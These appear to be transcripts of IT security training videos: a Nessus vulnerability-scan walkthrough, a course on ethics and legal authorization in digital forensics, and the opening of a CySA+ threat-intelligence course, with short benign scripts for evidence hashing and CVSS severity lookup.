[Video description begins] The "My Scans" page displays. It lists the "Windows 7 Scan 2" plugin. The "Last
Modified" column shows "N/A" as its corresponding value. [Video description ends]
And it's gone and created our scan here. So Windows 7 Scan 2, you can see that it hasn't executed yet, so now I
want to execute it. Now when I do execute this, so I hit the little run button, the little play button there, and you
can see here it is executing. And that'll take a few minutes as it goes and executes those plugins to determine
vulnerabilities against the target based off those plugins that were selected. So I'm going to pause the video here; it'll probably take about three minutes based off the few plugins that I've gone and enabled. So I'm going
to pause the video and then I'll resume it when it's all done. Okay, the scan is complete, it probably only took
about two minutes. I was only scanning one system and I selectively chose which plugins I wanted to execute,
so it was pretty quick. In real world, it'll take quite a bit of time, depending on the number of targets and the
number of plugins. Now to take a look at the results, what you do is you choose the scan. So here's my
Windows 7 Scan 2, so I click on it and it opens up a chart here.
[Video description begins] A page labeled "Windows 7 Scan 2" displays. It contains three tabs: Hosts, which
is currently selected, Vulnerabilities, and History. The values of which are 1, 11, and 1 respectively. A list
displays with "Host" and "Vulnerabilities" as headers. Sections titled "Scan Details" and "Vulnerabilities" are
present on the right hand-side. [Video description ends]
So you can kind of see, now, had I gone and scanned multiple targets, I'd have a whole list here of each of the targets. And you'd see listed, you know, a little line graph that shows you the
critical vulnerabilities, the high vulnerabilities, medium, low and information type messages. So normally you
will see kind of multiple colors here because there will be different levels of vulnerabilities that exist on a
system. So what you can do is you can kind of select the host if you wanted to or you can go right to the
vulnerabilities tab if you wanted. Now before I choose this host, I want you to notice over on the right we've
got our scan details. So I can see the name of the scan, I can see that it completed, it was an advanced scan, we
can see the start time and end time.
So you can see there, it only took two minutes to do, because it was just one system. And then we got a quick
little overview of the levels of vulnerabilities, right? Critical vulnerabilities versus, let's say, low
vulnerabilities, which show as a green piece of pie. And then you can hover over and you can see here that the
information data is 91% of the results whereas critical vulnerabilities is just 9% of the results. And again, you
would have different colors here for the different levels of vulnerabilities. So what I'm going to do is I'm going
to choose this system because I'm kind of curious to see, okay, what is this critical vulnerability?
[Video description begins] A new page titled "Windows 7 Scan 2 / 192.168.67.130" with a "Vulnerabilities"
tab displays. It contains a table with the following column headers: Sev, Name, Family, and Count. On the
right are two sections: Host Details and Vulnerabilities. [Video description ends]
And in this case, you can see the list of vulnerabilities, and you can see the information, but that critical one is
listed at the top. So they'll have the most important information towards the top. So what I can do is I can
scroll down here and kind of look at the results overall with this system. Or, I can click on the actual critical
vulnerability in this case, and I can read up on what this vulnerability is, right?
[Video description begins] A page titled "Windows 7 Scan 2 / Plugin#53514" displays. It lists details under
headings such as "Description" and "Plugin Details". [Video description ends]
So it says a vulnerability in DNS name resolution could allow remote code execution, right? And then it gives you a little description, all right? So, a flaw in the way the Windows DNS client processes link-local multicast name resolution queries, and so on. So you read the description, you read the solution, so they do have a set of patches. So basically, the system needs to be patched or updated. The other thing that I do like is over here on the right, you kind of see some information about the plug-in, so I can see that this is a remote vulnerability. So it does mean that a hacker
doesn't have to be on the system to execute the vulnerability. You'll see the risk information, so it's a critical
risk. And then down below, this is what I always watch for, is the vulnerability's Exploit Available: true. So that means there are exploits available that somebody could leverage to take advantage of this vulnerability
and potentially gain access to your systems. And so that's very important, I always look for that, especially
when performing a pen test. I want to prove the concept, I want to see if I can exploit that vulnerability. So I
just look, okay, is it exploitable? And then down bottom they have the Exploitable With, and I can see Metasploit, as Metasploit does have the capability to exploit this vulnerability. So now you know what
tools to use as a pen tester to exploit that vulnerability. So in this demonstration you've seen how to use Nessus
as a vulnerability scanner.
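To summarize the setup portion of this demonstration, the steps on the Kali Linux box look roughly like this; the .deb filename is a placeholder that depends on the version and platform you downloaded, and the activation code and admin account are supplied in the browser the first time you connect.

cd ~/Downloads
sudo dpkg -i Nessus-<version>-debian_amd64.deb   # install the downloaded package (placeholder filename)
sudo service nessusd start                       # start the Nessus daemon
sudo service nessusd status                      # confirm the daemon is running
# then browse to https://127.0.0.1:8834 to complete initialization and log in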
Objectives
[Video description begins] Topic title: Course Summary [Video description ends]
So, in this course, we've examined key concepts related to various types of security auditing, audit strategies, and auditing tools. We did this by exploring the key concepts of cyber security auditing, as well as the assessment and reporting processes.
We also covered how to use the Wireshark network security auditing tool and the nmap perimeter security tool; how to perform auditing for web applications, as well as Windows and Linux security monitoring; strategies for cyber security audits and comparing the pros and cons of various audit tools; and finally, how to use the Nessus
audit tool and run a Nessus security system scan.
Ethics & Privacy: Digital Forensics
This 12-video course examines the concept of ethics as it relates to digital forensics, including reasonable
expectation of privacy, legal authorization, and the primary function of attorney-client privilege and
confidentiality. The legalities surrounding digital forensics investigative techniques and standards for
analyzing digital evidence are also covered. Begin with a look at the definition of what is considered a
reasonable expectation of privacy. You will then learn to differentiate between legal authorization forms such
as consent forms and warrants. Next, explore the primary function of attorney-client privilege and
confidentiality, and recognize the legalities surrounding digital forensics investigative techniques. Delve into
the need for ethics in digital forensics, and the best practices for ethics and forensics. Discover steps for
regulating ethical behavior; recognize possible conflicts of interest and how to avoid them; and examine the
importance of ongoing training for both investigators and management on the importance of ethics. The final
tutorial in this course looks at different standards for analyzing digital evidence.
Table of Contents
Objectives
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years, teaching organizations how to manage their
network environments and program applications with Microsoft technologies. I'm also an award-nominated
author who's authored the CompTIA Security+ certification study guide, the CompTIA Network+ certification study guide, and the best-selling CompTIA A+ Certification All-in-One For Dummies.
My focus over the last ten years has been teaching Microsoft certified courses, information security courses,
and networking courses such as Cisco ICND 1 and ICND 2. Aspiring security architects should have a solid
understanding of the role and implications of ethics and privacy considerations as they proceed through the
world of forensics.
In this course, I'll explore ethics as it relates to digital forensics, including privacy, legal authorization, ethical
decision making, potential conflicts, and standards. First, I'll describe what is considered reasonable
expectation of privacy, legal authorization forms such as warrants, the primary function of attorney-client privilege and confidentiality, and the legalities surrounding digital forensics investigative techniques.
Then I'll discuss the need for ethics in digital forensics, what the best practices for ethics and forensics are, and
discuss the steps to regulate ethical behavior. Moving on, I'll explore conflicts of interest, describe the
importance of ongoing training, and finally, I'll examine the different standards for analyzing digital evidence.
During this video, you will learn how to define what is considered a reasonable expectation of privacy.
Objectives
[Video description begins] Topic title: Expectation of Privacy. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about expectation of privacy as it relates to computer forensics.
[Video description begins] Screen title: Expectation of Privacy. [Video description ends]
Expectation of privacy in the computer forensics world is an important topic. Expectation of privacy is the principle that your personal computer or personal laptop should be considered a private container, and law enforcement cannot look through its files without obtaining a search warrant.
The problem is, there are different interpretations of what expectation of privacy applies to. Does it apply to
personal devices such as phones and laptops? Does it apply to public computers, such as computers found in
Internet cafes and public libraries? And does it apply to your work computers and your laptops? If law
enforcement suspects that I have committed a crime, they cannot just take my laptop and search it for evidence, because that laptop is my private property and should be considered a private container.
Before law enforcement can search through my computer, they must ensure they have the appropriate authorization by obtaining a search warrant. Authorization is needed due to the Fourth Amendment protection and the fact that people have an expectation of privacy. As a general rule, you can consider any of your personal property, such as a laptop or phone, as being an object for which law enforcement needs authorization before sifting through the contents.
But what about public computers such as library computers and computers found at Internet cafes? This is
definitely a gray area, but it has been ruled that if you knowingly expose information to others, then that information is not protected by the Fourth Amendment. Let's look at a different scenario.
[Video description begins] Screen title: Private Searches. [Video description ends]
What if you had taken your laptop to a local computer shop to have repairs done? If the technician stumbles across incriminating evidence while doing the repairs, that information is admissible in court, even though no search warrant was obtained, because you had given your device to that person. For example, if the
technician stumbled across child pornography, they would report it to police.
Police would use that information to obtain a search warrant to search the computer for more evidence. The
initial evidence would be admissible due to the fact that law enforcement did not ask the technician to look for
it. But any evidence after the police are contacted would need a search warrant as authorization. The next
concern is, what about work computers?
[Video description begins] Screen title: Work-issue Computers. [Video description ends]
Do employees have an expectation of privacy as it relates to their work computers? The Supreme Court
believes that employees should have an expectation of privacy as it relates to personal use of the company
computer. So, it's the job of the employer to lower that expectation of privacy. Companies do this by giving
notification to users that all their activity is monitored, including email and Internet usage. For example, many
companies use a log on banner stating all activity is monitored. And the employee must agree to the terms
anytime they log on to a company system. The Supreme Court has ruled that a search warrant is needed by law
enforcement when a co-owned computer or shared computer is involved.
[Video description begins] Screen title: Shared Devices. [Video description ends]
The backstory on this is that there was a case where a wife found child pornography on the family computer and gave permission to police to seize the computer. The evidence was thrown out at trial due to the fact that law enforcement didn't have a search warrant before seizing the computer. There was an appeal, and the appeal court allowed the evidence and forced a retrial.
Then the Supreme Court took the side of the initial hearing and ordered the evidence inadmissible and the
husband was acquitted. A key point to take from this is that computer forensics and expectation of privacy is
not a clear cut topic. There is much debate over what expectation of privacy is. In today’s day and age, mobile
devices such as cell phones and tablets are heavily used by individuals.
[Video description begins] Screen title: Mobile Devices. [Video description ends]
They are also subject to evidence collection when a legal incident arises. Because cell phones and tablets contain a wealth of different types of sensitive information, law enforcement has to be very disciplined in how they deal with such devices. Examples of sensitive information would be photos, videos, and communication messages with other parties, such as text messages and email messages. Many courts and privacy acts find that users of cell phones containing private and personal information have a reasonable expectation of privacy, because mobile devices contain private information about a person's life. Because courts and privacy acts, such as the Canadian Charter of Rights, specify that everyone has the right to be secure against unreasonable search and seizure, law enforcement will have to ensure that they are careful to make reasonable searches and seizures with mobile devices, as it has been determined over and over again that mobile device users have an expectation of privacy.
[Video description begins] Screen title: Search Incidental to Arrest. [Video description ends]
There are times when the level of expectation of privacy is automatically lowered. For example, the Supreme
Court of Canada has determined there is a lowered expectation of privacy during a lawful arrest, or if law enforcement has lawful reason to perform a search.
Some examples of lawful reasons to perform a search are: in order to protect the police officer, the suspect, or the general public; in order to preserve any evidence; and, finally, the discovery of evidence. In order to locate additional suspects, searching for evidence on the cell phone may be needed. In this video,
you've learned about expectation of privacy.
Learn how to differentiate between legal authorization forms, such as consent forms and warrants.
Objectives
differentiate between legal authorization forms such as consent forms and warrants
[Video description begins] Topic title: Legal Authorization. Your host for this session is Glen E.
Clarke. [Video description ends]
[Video description begins] Screen title: Fourth Amendment. [Video description ends]
The Fourth Amendment of the United States Constitution was designed to protect the privacy of individuals by
restricting law enforcement from performing unreasonable searches and seizures. In order for evidence to be admissible in court, it has to be obtained in a lawful manner. Due to the Fourth Amendment, collecting
evidence in a lawful manner means a search warrant is needed prior to the search and seizure.
The Fourth Amendment ensures that people have the right to be protected against unreasonable searches on
their persons, their houses, their papers, and their personal effects. It should be noted that the Fourth
Amendment protects individuals' rights from unreasonable searches by an agent of the government, such as
law enforcement. It does not protect from private searches, say, a company monitoring an employee's email or
Internet usage. There are some exceptions where searches without a warrant are allowed,
[Video description begins] Screen title: Common Authority. [Video description ends]
and one of those exceptions is known as common authority. The common authority rule allows for a person to
give law enforcement the permission to perform a search on another person's property. The common authority
rule is allowed in scenarios where both parties have control over the same property. A legal term we hear of at
times is the term apparent authority.
[Video description begins] Screen title: Apparent Authority. [Video description ends]
Apparent authority is a term to describe when a principal, such as a company, indicates to a third party that an agent is authorized to act on its behalf. This means that a company is bound by the agent's actions unless the company proves the agent falsified the impression of apparent authority. One of the biggest questions
surrounding legal search and seizures is what are the requirements to obtain a search warrant.
[Video description begins] Screen title: Search Warrant Requirements. [Video description ends]
The search warrant must be filed in good faith, meaning that the search warrant must be filed by an officer of
the law for lawful reasons. The search warrant must be based on reliable information that also shows probable
cause for the search and seizure. The warrant must be issued by a neutral magistrate. And finally, the warrant
must also state the specific location to search, and what specific items are being seized. There are exceptions
where law enforcement officers do not need a search warrant.
[Video description begins] Screen title: Search Warrant Exceptions. [Video description ends]
The first exception is consent: a person who holds the expectation of privacy in the property freely and voluntarily gives consent to law enforcement to search it. The second exception is plain view. If an officer is searching a property and a piece of evidence is seen in plain view, they may seize that evidence. The third exception is search incident to arrest.
This means that if an officer is making an arrest, they have the right to search the person and surrounding areas for weapons or other objects to keep the officer safe. If evidence is found during this process, a search warrant is not needed. Exigent circumstances is another exception. This is when a police officer believes others may be placed in danger, or the evidence could be destroyed in the time it takes to obtain a search warrant.
The second-to-last exception is the automobile exception. If law enforcement has reason to believe there is contraband in the vehicle, they may search the vehicle. The last exception is hot pursuit. If law enforcement is in hot pursuit of a fleeing criminal, they may enter private property and search the entire area without obtaining a search warrant. In this video, you learned about legal authorization, with topics such as the Fourth Amendment and search warrants.
[Video description begins] Topic title: Attorney-Client Privilege. Your host for this session is Glen E.
Clarke. [Video description ends]
[Video description begins] Screen title: Attorney Client Privilege. [Video description ends]
Attorney-client privilege is a tenet of law that is designed to allow for open communication between a lawyer and their client. This principle means that details the client discloses to their lawyer are to be maintained in confidence by the lawyer. Without such a tenet, it was determined that a client would withhold information from their lawyer, and as a result not receive the best legal advice possible. In order for communications to be protected under attorney-client privilege, there are criteria.
[Video description begins] Screen title: Protected Communication. [Video description ends]
First, the person must be seeking legal advice from a lawyer, and that lawyer will be acting as the person's legal advisor. Second, the communication must be made for the purpose of obtaining legal advice. Third, the communication must be made in confidence, meaning there can't be other people in the room when the client communicates with their lawyer. And lastly, the communication must be made by the client. There are exceptions to the attorney-client privilege rule that you should be aware of.
In the following circumstances, information learned is not governed by attorney-client privilege. First, the communication must be for legal advice; business advice, for example, is not governed by attorney-client privilege. Attorney-client privilege also does not apply to communications that involve a crime being committed or that facilitate a crime being committed. Lawyers are not the only people who must hold information related to a client confidential.
[Video description begins] Screen title: Expert Obligation. [Video description ends]
Other third-party persons involved in the case must maintain confidentiality, such as the computer forensics investigator who is filtering through the digital evidence. It is important to note that these experts are typically not present when the client communicates with the lawyer. But the expert obligation states that the information the expert discovers must be maintained in confidence. In this video, you've learned about attorney-client privilege.
Upon completion of this video, you will be able to recognize the legalities surrounding digital forensics
investigative techniques.
Objectives
[Video description begins] Topic title: Investigative Techniques. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video you will learn about investigative techniques used by forensics investigators.
[Video description begins] Screen title: Possession of Exhibits. [Video description ends]
It is important that the forensics investigator follows legal techniques to locate evidence so that the evidence is
admissible in court. Questions that need to be answered are, is the evidence co-owned? Can the exhibit be
analyzed without legal authorization? And does the exhibit belong to an employee? The key point with each of
these questions is that the device has to be obtained in a legal manner. The device owner must authorize law
enforcement to perform the search in order for the search and seizure to be lawful without a warrant. All
evidence must be obtained in a legal manner.
[Video description begins] Screen title: Electronic Communications. [Video description ends]
This means that using hacking techniques to obtain evidence is unlawful and could end up with criminal charges being laid against anyone using such techniques. This includes evidence obtained from keyloggers, spyware, or persistent cookies. Many states require that the forensics examiner being used be a licensed forensic examiner.
In many states, if an unlicensed forensic examiner is used, it could result in imprisonment, damages, and fines, not only for the forensics examiner but also for the legal team that's using the forensics examiner. The American Bar Association is against such legislation, as in many cases the forensic work could be performed in different states. For example, the imaging of the drives could be done in one state while the analysis of the data could be performed in another state. Another legal consideration is the mining of data that an individual would feel is an invasion of their privacy.
[Video description begins] Screen title: Aggregation and Inference. [Video description ends]
An example of this is the tracking of a person's location using their IP address. Put into question is whether an investigator who analyzes data outside the formal discovery process is committing an invasion of privacy. Is it a case of intrusion upon seclusion, which means intentionally intruding upon someone's private affairs? Or is it a case of tort liability, a tort being a wrongful act or an infringement of a person's rights? There have been cases where invasion of privacy has been claimed due to the reconstruction of data by aggregation and inference, which is the collection of data and the drawing of conclusions based on that data. One final consideration is how the digital forensics examiner interacts with the prosecutor.
[Video description begins] Screen title: Responsibilities of a Prosecutor. [Video description ends]
It is important to note that if a forensics examiner discovers evidence during a non-criminal investigation and reports it to law enforcement, law enforcement must then request a search warrant based on probable cause before searching for more evidence on the media. If the forensic examiner is asked to keep looking for evidence, they are then acting as an agent of the law, and any evidence found would be inadmissible in court because no search warrant exists. In this video, you learned about investigative techniques and considerations.
After completing this video, you will be able to describe the need for ethics in digital forensics.
Objectives
[Video description begins] Topic title: Ethics in Digital Forensics. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about ethics in computer forensics. A digital forensics examiner has access to a lot
of different types of
[Video description begins] Screen title: Ethics in Digital Forensics. [Video description ends]
privileged information. The types of information they have access to are often controversial: trade secrets, threats to national security, communications between different parties, and personal information such as diaries, videos, and photos. The evidence that is found or not found on digital media is key to the outcome of the case. One of the challenges with digital forensics is the ever-changing technology that drives our everyday lives.
[Video description begins] Screen title: Various Disciplines. [Video description ends]
Due to rapid changes in technology, there's a constant need for educated forensic specialists. Some areas that have arisen over the last few years and that are evolving computer forensics include ethical hacking, forensics in the cloud, and the Internet of Things. One of the challenges faced by computer forensics professionals
[Video description begins] Screen title: Emerging Technology. [Video description ends]
is that the laws, whether civil law or criminal law, have not kept up-to-date with technology trends. For example, the Electronic Communications Privacy Act makes no reference to the Internet. It is critical that forensics examiners stay up-to-date with technologies and hold themselves to an ethical standard. There is a code of ethics that digital forensics examiners must follow.
[Video description begins] Screen title: Code of Ethics. [Video description ends]
The code of ethics is designed as a minimum standard of acceptable conduct and is not a substitute for lawfulness. The code of ethics applies to all activities performed by the forensics examiner, including any research performed by the examiner; the collection, preservation, and analysis of evidence; and finally, any testimony given inside a court of law. A key point to make is that the code of ethics is not an exhaustive list of permitted behaviors or prohibited behaviors. The code of ethics does not list all the do's and don'ts of computer forensics, because it could be interpreted that something not on the do's and don'ts list is allowed.
For this reason, the code of ethics is intentionally kept general. The code of ethics that governs forensics examiners is designed to give guidance to professionals acting in good faith. Forensics examiners are expected to have good moral character and to have training and experience in a number of areas, such as separation of duties, intellectual property law, and criminal law as it relates to computer forensics, as well as characteristics such as reasonable care, loyalty, independence, and confidentiality. The code of ethics is not a set of laws, but an examiner not following the code of ethics could cause harm to others, which could leave the forensics examiner facing sanctions by the court, damage liabilities, and/or criminal liabilities. A forensics examiner not following the code of ethics could also ruin his or her reputation very quickly, which would result in no one calling upon their services anymore. In this video, you learned about the importance of ethics in computer forensics.
Upon completion of this video, you will be able to describe best practices for ethics and forensics.
Objectives
describe best practices for ethics and forensics
[Video description begins] Topic title: Ethical Decision Making. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about ethics governing a computer forensics professional.
Ethics comes from a Greek word relating to morals, or having morals, and it is a set of principles that govern a person's behavior.
Another way to think about this is that ethics is the discipline of dealing with what is good and what is bad. For
many, ethics is the professional norms shared by a group of individuals or a governing body. The nature of
work performed by a forensics examiner is seen by many as being tedious, offensive, improper, and unethical.
[Video description begins] Screen title: Nature of Work. [Video description ends]
One of the reasons people may view the work of a computer forensics professional as being offensive,
improper, or unethical is due to the expectation of privacy people have when it comes to digital media. A
computer forensics professional will need to have knowledge of laws and professional norms that affect their
profession,
[Video description begins] Screen title: Ethical Decision-making. [Video description ends]
but also follow these ethical principles. Honesty: they must be truthful, and being truthful is a big part of good morals. Prudence: they must have wisdom in their field. And compliance: they should comply with the law and professional norms. With these three principles in hand, the computer forensics examiner can make ethical decisions when faced with dilemmas on the job. In this video, we learned about computer forensics ethics.
After completing this video, you will be able to recognize the steps for regulating ethical behavior.
Objectives
[Video description begins] Topic title: Regulating Ethical Behavior. Your host for this session is Glen E.
Clarke. [Video description ends]
Due to the nature of computer forensics tools and procedures, it's critical that the ethical guidelines ensure that
forensic specialists are conducting themselves in an ethical manner. Digital forensics procedures are focused
on the recovery and analysis of digital content found on all kinds of different types of devices. It's important
that a forensic specialist be able to remove any bias they may have toward a case, as they are to act as a specialist
providing expert testimony. The ethical guidelines for computer forensic specialists are needed to ensure that
examiners do not present data in an obscure manner.
[Video description begins] Screen title: Ethical Guidelines. [Video description ends]
Data should be presented in a clear, concise fashion. Also, they should not withhold crucial information that
could affect the outcome of the case. And finally, they should not predetermine the outcome of their
investigation. It is important that computer forensics professionals are ethical in their behavior.
This involves performing a complete and thorough investigation and presenting the true facts of their findings. Mandatory requirements of ethical forensics behavior are neutrality in the investigation and the delivery of true facts so that the court can accurately decide the outcome of the case. In this video, you learned
about regulating ethical behavior.
After completing this video, you will be able to recognize possible conflicts of interest and how to avoid them.
Objectives
[Video description begins] Topic title: Conflict of Interest. Your host for this session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about conflict of interest, as it relates to computer forensics.
[Video description begins] Screen title: Conflict of Interest. [Video description ends]
A conflict of interest is when an individual has a personal interest that could influence the outcome of his or her duties. There are many examples of what "interest" means in this definition. It could be financial gain through some form of compensation, or it could be some form of personal advantage that the person would obtain.
It is critical to the profession that a forensics examiner stay true to the ethics and avoid scenarios of conflict.
[Video description begins] Screen title: Avoiding Conflict. [Video description ends]
This means that forensics examiners should not have any emotional investment or monetary benefit that is
dependent on the outcome of a case. This includes fees being paid to the forensics examiner. The fees are paid
for the examiner's expertise and time, not for the outcome. As a forensics specialist, remember that neutrality
and lack of interest in the case are the key to avoiding conflict. In this video, you've learned about conflict of
interest.
Upon completion of this video, you will be able to describe the importance of ongoing training for both
investigators and management on the importance of ethics.
Objectives
describe the importance of ongoing training for both investigators and management on the
importance of ethics
[Video description begins] Topic title: Qualifications and Training. Your host for this session is Glen E.
Clarke. [Video description ends]
Two important qualities for any forensic specialist are ethics and competence. Professional competence is
having the knowledge and skill to eliminate errors in your work so that you're not led to have errors in
judgment. In order to increase your competence as a forensic specialist, you should always be learning and
updating your skills in all aspects of computer forensics. This includes being current in advances in
technologies, but also with laws and regulations. As a computer forensic specialist, you must ensure that you maintain ethical behavior.
[Video description begins] Screen title: Ethical Behavior. [Video description ends]
This can be accomplished with these three main strategies. First, ensure that you are accurately following all
forensics processes when it comes to search, seizure, and analyzing digital evidence. You must also accurately
present your credentials and be sure not to misrepresent or overstate your qualifications. And finally, as a
forensic specialist, you must always behave responsibly, which includes keeping confidential information private, as required by law and by your profession. As a forensic specialist, your job is not to pass judgement
on whether the suspect is guilty or not guilty.
[Video description begins] Screen title: Judgement. [Video description ends]
It's the job of the courts to determine that. The job role of the computer forensic specialist is to acquire the
evidence. This typically involves creating a forensically sound image of the data. Then you'll need to analyze
that evidence. This involves searching through the data that's inside the image to locate the appropriate
evidence. And then finally, you want to report on your findings. In this video, you've learned about
professional competence.
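Before moving on, here is a small illustration of the integrity-verification idea behind a forensically sound image. A common practice is to hash the acquired image so it can be re-verified later. This Python sketch is not tied to any particular forensic tool, and the image file name is hypothetical.

```python
import hashlib

def hash_image(path, algorithm="sha256", chunk_size=1024 * 1024):
    """Compute a hash of a disk image in chunks so large files fit in memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as image:
        for chunk in iter(lambda: image.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hash the image at acquisition time, record the value, and recompute it later
# to demonstrate the evidence has not changed (hypothetical file name).
acquisition_hash = hash_image("evidence_drive.dd")
print("SHA-256 at acquisition:", acquisition_hash)
```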
Upon completion of this video, you will be able to recognize the different standards for analyzing digital
evidence.
Objectives
[Video description begins] Topic title: Analysis Standards. Your host for this session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about different standards for analyzing digital evidence.
[Video description begins] Screen title: National Institute of Standards and Technology (NIST). [Video
description ends]
The National Institute of Standards and Technology, or NIST for short, is an organization that develops standards and guidelines for a number of technologies and security requirements. As it relates to computer forensics, the Information Technology Laboratory, or ITL, is a part of NIST that has three projects that aid organizations in ensuring they're using valid, forensically sound software to perform their forensics investigations.
The first project is the National Software Reference Library, which is a listing of files used by common applications along with hash values representing those files. This library is used by forensics investigators to identify valid files on the system that do not need further investigation. This allows the investigator to avoid wasting time and to focus on other evidence files on the system.
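To make the idea of filtering out known-good files concrete, here is a minimal Python sketch. It assumes, purely for illustration, that you have exported an NSRL-style hash set to a text file containing one SHA-1 value per line; the file and directory names are hypothetical.

```python
import hashlib
from pathlib import Path

def load_known_hashes(hash_file):
    """Load an NSRL-style list of known-good SHA-1 hashes, one per line."""
    with open(hash_file) as f:
        return {line.strip().lower() for line in f if line.strip()}

def sha1_of(path):
    """Hash a file in chunks so large evidence files fit in memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def files_needing_review(evidence_dir, known_hashes):
    """Yield files whose hashes are NOT in the known-good set."""
    for path in Path(evidence_dir).rglob("*"):
        if path.is_file() and sha1_of(path) not in known_hashes:
            yield path

# Hypothetical paths: a mounted image and an exported hash set.
known = load_known_hashes("nsrl_sha1.txt")
for suspicious in files_needing_review("/mnt/evidence", known):
    print(suspicious)
```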
The second project is the Computer Forensic Tool Testing project, which is a methodology for testing forensic software. It is a specification for test procedures and test criteria used to verify the validity of forensic software. The third project is the Computer Forensic Reference Data Sets, which is a set of digital evidence that a forensics investigator can use to test and verify forensic software. The reference data sets contain well-documented evidence, such as search strings, that the examiner can use to verify that the forensics tools they're using can locate the same information. Another standards organization is the International Organization for Standardization, or ISO.
[Video description begins] Screen title: International Organization of Standardization (I S O). [Video
description ends]
ISO provides guidelines related to the identification, collection, acquisition, and preservation of digital
evidence. The purpose of these guidelines is to ensure that digital evidence is handled in a forensically sound
manner. These guidelines are acceptable practices all over the world. The Global Information Assurance
Certification, or GIAC, has developed a code of ethics that should be followed by all digital forensics
professionals.
[Video description begins] Screen title: Global Information Assurance Certification (G I A C). [Video
description ends]
The first code of ethics is respect for the public. This means that the computer forensics professional will act
responsibly, and ensure that his or her decisions do not negatively affect the public, their reputation, or the
reputation of the forensics profession. The second code of ethics is respect for the certification, which means
that the forensics professional will not distribute proprietary information about GIAC certifications and their
processes.
The third part of the code of ethics is respect for my employer, which means that the examiner will deliver competent services and maintain confidentiality with private data that they come in contact with. The fourth and final part of the code of ethics is respect for myself, which means the forensics professional will avoid any conflict of interest, and not misuse any information learned or privileges gained through their profession. As a way to maintain high
ethical standards, the GIAC has an ethics council that is elected by the advisory board.
[Video description begins] Screen title: G I A C Ethics Council. [Video description ends]
The ethics council performs a number of activities related to ethical matters in regards to GIAC certifications. They investigate any ethics incidents and enforce the code of ethics. They provide advice to the GIAC director in regards to ethical issues. And finally, they assist members with ethical questions or concerns they have in relation to GIAC certifications. GIAC prioritizes its code of ethics and has a process in place to handle violations of the GIAC code of ethics.
[Video description begins] Screen title: Ethics Violations. [Video description ends]
The first step in the process is complaint submission. Anyone can submit an online written complaint regarding
a violation of ethics through the GIAC site. The complaint is then reviewed and an investigation into the details occurs. The ethics council performs this investigation and creates a report with any recommended discipline for the director to review.
If an individual has been found in violation of the code of ethics, they may appeal within 30 days. The appeal is handled by the GIAC appeals committee, which communicates a recommendation to the director. The director
then communicates the outcome of the appeal to the interested parties. In this video, you've learned about
industry standards in relation to computer forensics.
[Video description begins] Topic title: Course Summary. Your host for this session is Glen E. Clarke. [Video
description ends]
In this course, we've examined ethics as it relates to digital forensics, including areas such as privacy, legal authorization, ethical decision making, potential conflicts, and standards. We did this by exploring topics such as the reasonable expectation of privacy and the differences between legal authorization forms.
We also discussed the primary function of attorney-client privilege and confidentiality, and the legalities surrounding digital forensics investigative techniques. We also explored the need for ethics in digital forensics, best practices for ethics in forensics, and steps to regulate ethical behavior. We also explored possible conflicts of interest and how to avoid them.
We covered topics such as the importance of ongoing training for investigators and management on the importance of ethics. And finally, we discussed the different standards for analyzing digital evidence.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
trainer/consultant. [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT
security, cloud solutions, Linux management, and configuration and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam is designed for IT professionals
looking to gain security analysts' skills to perform data analysis; to identify vulnerabilities, threats, and risks to
an organization; to configure and use threat detection tools; and secure and protect an organization's
applications and systems.
In this course, we're going to explore ways for security technicians to keep up-to-date with the latest IT
security threats. I'll start by examining various security intelligence sources and how to use the MITRE
ATT&CK knowledge base. I'll then examine threat intelligence collection, threat classification for
prioritization, and different sources and motivations of IT threats.
Next, I'll explore the dark net and I'll demonstrate how to install and use the Tor web browser. I'll continue
with an examination of threat positives and negatives, threat indicator management, and threat modeling.
Lastly, I'll explore the Common Vulnerability Scoring System, or CVSS, security levels and commonalities
shared amongst bug bounties.
[Video description begins] Topic title: Sources of Intelligence. Your host for this session is Dan
Lachance. [Video description ends]
Threat intelligence is all about having the required information so that you can prevent attacks or even reduce
the impact that attacks have on a business. [Video description begins] Slide title: IT Security Intelligence
Sources. [Video description ends] This includes sources at the government level and also intelligence sources from the
private sector. At the government level, there are some cybersecurity knowledge bases; for example, from the
Department of Homeland Security in the United States, as well as the FBI.
On the private sector side, we've got different institutions like the SANS Institute, OWASP, and even antivirus
vendor websites that provide a wealth of intelligence sources. There are also many open-source IT security
intelligence sources, including the SANS Institute. This is a U.S. organization that exists for the purpose of providing information about information security.
Then there's the Common Vulnerability Scoring System, or CVSS. This is a free, open standard that IT security professionals use to rate the severity of vulnerabilities, and it's used by public vulnerability databases where you can take a look at the most recent threats. Of course, you can go back in time and look at old threats as well. CVSS uses severity rating levels so that you can take a look at, for example, only the most severe recent IT threats. That way, you can prioritize your organization's response to them.
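As a quick reference, the CVSS v3.x specification maps base scores to qualitative severity ratings. The small Python helper below encodes those published ranges so you could, for example, sort scanner output by severity; it is only a sketch, not part of any particular tool, and the CVE names and scores in the example are made up.

```python
def cvss_severity(base_score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative severity rating."""
    if base_score == 0.0:
        return "None"
    if base_score <= 3.9:
        return "Low"
    if base_score <= 6.9:
        return "Medium"
    if base_score <= 8.9:
        return "High"
    return "Critical"

# Example: prioritize the most severe findings first (scores are invented).
findings = {"CVE-A": 9.8, "CVE-B": 5.4, "CVE-C": 7.2}
for cve, score in sorted(findings.items(), key=lambda kv: kv[1], reverse=True):
    print(cve, score, cvss_severity(score))
```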
